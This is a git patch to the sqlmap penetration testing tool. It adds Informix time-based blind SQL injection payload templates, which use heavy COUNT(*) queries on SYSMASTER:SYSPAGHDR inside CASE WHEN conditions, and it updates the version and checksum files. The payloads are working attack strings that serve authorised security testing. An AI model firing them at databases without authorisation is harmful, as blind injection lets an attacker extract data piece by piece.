From d36b5c0a4b8f989ca24238a6e99c7dcef771ff67 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 28 Sep 2016 10:30:09 +0200 Subject: [PATCH] Adding time-based blind (heavy query) payloads for Informix (Issue #552) --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 +- xml/payloads/time_blind.xml | 103 ++++++++++++++++++++++++++++++++++-- 3 files changed, 103 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index f2c684b1b..7332e4a72 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS from lib.core.revision import getRevisionNumber # sqlmap version (...) -VERSION = "1.0.9.45" +VERSION = "1.0.9.46" REVISION = getRevisionNumber() TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 4e43ca70b..23518194e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -45,7 +45,7 @@ e60456db5380840a586654344003d4e6 lib/core/readlineng.py 5ef56abb8671c2ca6ceecb208258e360 lib/core/replication.py 99a2b496b9d5b546b335653ca801153f lib/core/revision.py 7c15dd2777af4dac2c89cab6df17462e lib/core/session.py -5cd9c085558c79b12f5757611a76eb36 lib/core/settings.py +3f2deb69d28171ca0c00708ce0255ee8 lib/core/settings.py 7af83e4f18cab6dff5e67840eb65be80 lib/core/shell.py 23657cd7d924e3c6d225719865855827 lib/core/subprocessng.py 0bc2fae1dec18cdd11954b22358293f2 lib/core/target.py @@ -453,6 +453,6 @@ a279656ea3fcb85c727249b02f828383 xml/livetests.xml 103a4c9b12c582b24a3fac8147a9c8d4 xml/payloads/error_based.xml 06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml 96adb9bfbab867d221974d3ddb303cb6 xml/payloads/stacked_queries.xml -c8b152ecebf04ec997e52c6c78cbd488 xml/payloads/time_blind.xml +9abc699fadede1e31586c2263ca900a4 xml/payloads/time_blind.xml 033b39025e8ee0f302935f6db3a39e77 xml/payloads/union_query.xml 1587a02322a96ac48973e782d6fedf73 xml/queries.xml diff --git a/xml/payloads/time_blind.xml b/xml/payloads/time_blind.xml index a2facddcc..80a3facc3 100644 --- a/xml/payloads/time_blind.xml +++ b/xml/payloads/time_blind.xml @@ -1337,7 +1337,85 @@ > 2.0 - + + + Informix AND time-based blind (heavy query) + 5 + 2 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) + + + + +
+ Informix +
+ + + + Informix OR time-based blind (heavy query) + 5 + 2 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) + + + + +
+ Informix +
+ + + + Informix AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) + -- + + + + +
+ Informix +
+ + + + Informix OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) + -- + + + + +
+ Informix +
+ + @@ -1697,7 +1775,7 @@ IBM DB2 - + HSQLDB >= 1.7.2 time-based blind - Parameter replace (heavy query) @@ -1738,6 +1816,25 @@ > 2.0 + + + Informix time-based blind - Parameter replace (heavy query) + 5 + 4 + 2 + 1,2,3,9 + 3 + (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END) + + (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) + + + + +
+ Informix +
+ @@ -1938,6 +2035,6 @@ > 2.0 - +